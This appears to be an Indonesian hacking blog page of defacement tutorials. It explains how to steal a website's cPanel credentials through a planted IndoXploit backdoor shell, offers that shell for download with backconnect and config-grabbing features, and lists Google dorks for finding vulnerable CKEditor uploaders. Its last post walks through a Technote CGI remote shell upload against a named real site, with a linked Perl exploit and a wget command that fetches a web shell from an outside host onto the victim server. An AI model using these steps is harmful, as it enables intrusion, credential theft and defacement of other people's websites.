Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

Dan lagi :D, gua gak bakal bosan share tutorial disini :D
dan kali ini tutorialnya adalah Tutorial Crack CPanel Suatu Website :D.
Sebenarnya, ini sama halnya kalian nyolong CPanel orang :v wkwkwk. oke sebelum mulai tutorialnya, kalian harus persiapkan bahannya :D

Bahan-bahannya :
1. Shell Backdoor yang sudah ketanam ( IndoXploit Shell ).
2. Internet yang stabil :D
3. sabun :v (Wajib hukumnya :v)

oke kalau semua bahannya udah siap mari kita mulai :v

Disini saya menggunakan Shell IndoXploit :D 
Pertama, akses shell backdoor yang sudah kalian tanam di web. lalu klik config.
lalu klik "Done" 



Tunggu beberapa saat, nanti akan muncul config dari web.seperti gambar dibawah.


Setelah muncul confignya, klik CPanel Crack :D. nanti akan muncul user dan password. apabila tidak ada user dan password yang muncul, itu berarti CPanel webnya tidak bisa di Crack.


Klik Crack. dan tunggu beberapa saat. nanti akan muncul username dan password CPanel yang sudah di Crack. Saran saya, gunakan internet yang stabil :D


dan Taraaa... :D User dan Pass CPanelnya sudah kita dapatkan. tinggal login ke CPanelnya :D. untuk login cpanelnya, site.com/cpanel

Oke sekian Tutorial Crack Cpanel nya, semoga bermanfaat :D.
Terima Kasih.

Tutorial Crack Cpanel Suatu Website

Author : DindaKyuut Comments : 0
Hai Guys...
Kali ini saya bakal share IndoXploit Shell First Edition [V.2] :D
Shell yang satu ini memang sudah tidak asing lagi bagi para defacer, dengan tampilan yang simple dan fiturnya yang mantap.

Tampilan shellnya sebagai berikut :

Password default shell : IndoXploit


Fitur :

K-RDP Shell :
Fitur untuk membuat akun RDP yang hanya dapat digunakan di Windows Server

BackConnect

Cpanel/FTP Auto Deface :
memakai fitur ftp_connect, hanya memanfaatkan kessamaan password cpanel dan ftp saja. Tidak Semuanya Bisa,

Config :

  • CMS POPOJI
  • CMS Voodoo
  • Wordpress
  • Joomla
  • Drupal
  • Magento
  • Ellislab Devteam [CI]
  • OpenCart
  • Prestashop
  • Lokomedia
  • Sitelook
  • Bosweb
  • WHMCS
  • Cpanel


Jumping [error fixed]
Jumping hpshere & Jumping /var/vhosts [Updated]
kelebihannya yaitu bisa langsung ambil nama domainnya

Cpanel Crack [blank user/pass fixed]:

Fitur ini sudah otomatis grab passwordnya dan otomatis mengambil info domainnya,ikuti saja petunjuknya.

SMTP Grabber :
Hanya mengambil info SMTP joomla yang ada di config.

Auto Edit User / MPC :

Otomatis edit user admin dari config, tidak semuanya bisa. cuma beberapa cms aja.

untuk yang mau download shellnya Disini

Sekian Postingan kali ini. Terima kasih

Sumber : www.indoxploit.or.id

Download IndoXploit Shell First Edition [ V.2 ]

Author : DindaKyuut Comments : 0
Hallo Minna Disini Saya Mau Share Tools Symlink Auto Get Config - Tidak Usah Basa Basi Ya Langsung aja Cek !




DISINI GAN ]

Cukup Sekian Dan Terima Kasih Assalamualaikum Wr Wb


SUMBER : TATSUMI CREW

Tatsumi Symlink Auto Get Config

Author : DindaKyuut Comments : 0
Hai guysss.... kali ini gua share Tutorial Deface CKEditor Imageuploader,  lumayan simple sih poc nya :'''v tpi gpp lah gua share aja

Dork :
- "/assets/master/ckeditor/plugins/imageuploader/"
- Inurl:/assets/master/ckeditor/plugins/imageuploader/
- inurl:/imageuploader/ "imgdelete.php"

Step by Step :
1. Dorking di google


2. Pilih target kalian

3. Setelah itu, klik " Imgbrowser.php "


4. Klik tanda " panah ke arah atas " di samping paling atas, kalau tidak tau, itu screenshot nya dan sudah saya lingkari


5. Setelah itu, upload image/foto kalian.....


6. Setelah di upload, dimana akses nya?? di sini
    Site.com//assets//uploads//namafotokalian.jpg

7. dan WIKILEAF touched :')


Bingung? silahkan comment atau contact saja saya
Facebook : Touch Me
Sumber : Magelang1337

Thanks to : www.magelang1337.com - Justice Crew - GopressXploits - Tatsumi Crew :)

Tutorial Deface CKEditor Imageuploader

Author : DindaKyuut Comments : 0
Hallo mina disini saya akan share tutorial deface Teknik RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability 
Tidak Usah Basa Basi Langsung Aja Ke TKP..........

Pertama Kita Dorking Dulu Webnya 
Google Dork 1 : inurl:/cgi-bin/technote/
inurl:".cgi?board=FREE_BOARD"  
intext:"TECHNOTE-TOP"
kembangkan lagi bang biar banyak yang perawan



disini saya sudah mempunyai target :)
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD&number=20&view=2&howmanytext= 
kita ambil linknya sampe FREE_BOARD SAJA  
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD

Langkah Selajutnya Kita Download Dulu Tools/Exploit nya :)




https://pastebin.com/raw/jb4Zf0kn 

Ubah Ekstensi Menjadi pl karena ini codingan perl

gimana sih cara jalanin toolsnya ?
anda bisa menggunakan xampp  
karena disini saya menggunakan OS Berbasis Ubuntu Jadi tidak Perlu Install Install Lagi h3h3

Langkah Selanjutnya 
Buka Terminalnya 
 

kalian cukup ketik perintah / copy : 
perl namafile.pl target 

 

Enter Maka Hasilnya Akan Seperti Ini
 

itu berati vuln ? tidak semua yang vuln bisa ditanem shell/file lainnya
disini kita akan tanem shell dengan menggunakan direct txt ke php
gimana sih caranya ?

setelah ss di atas ketik perintah ls < untuk menampilkan folder folder / file yang ada di web tersebut 

 

maka hasilnya akan seperti diatas
setelah itu anda tinggal masuk ke salah satu folder diatas
disini saya akan masuk ke folder board 
dengan ketik perintah cd board

 

maka hasilnya akan seperti ini 
nah disini yang akan kita lakukan untuk menanem shell backdor anda bisa menggunakan shell backdor yang berada di web kami yang ber eks .txt

gimana sih ko txt bisa diubah ke php  ?

dengan ketik perintah diterminal
wget http://showbizz98.com/tc.txt -O kontol.php < nah itu kontol.php adalah untuk mengubah shell txt ke php 


jika berhasil maka hasilnya akan seperti ss di atas 
bang dimana sih letak shell nya :'( ?
kan tadi sebelumnya kita sudah masuk folder kita ambil aja contoh link di atas /cgi_bin/board/namashell.php


SUMBER : TATSUMI CREW

Tutorial Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability

Author : DindaKyuut Comments : 0

- Copyright © X-CHEAT-VIP - Simple Theme - Powered by Blogger - Designed by Abdul ithansyah -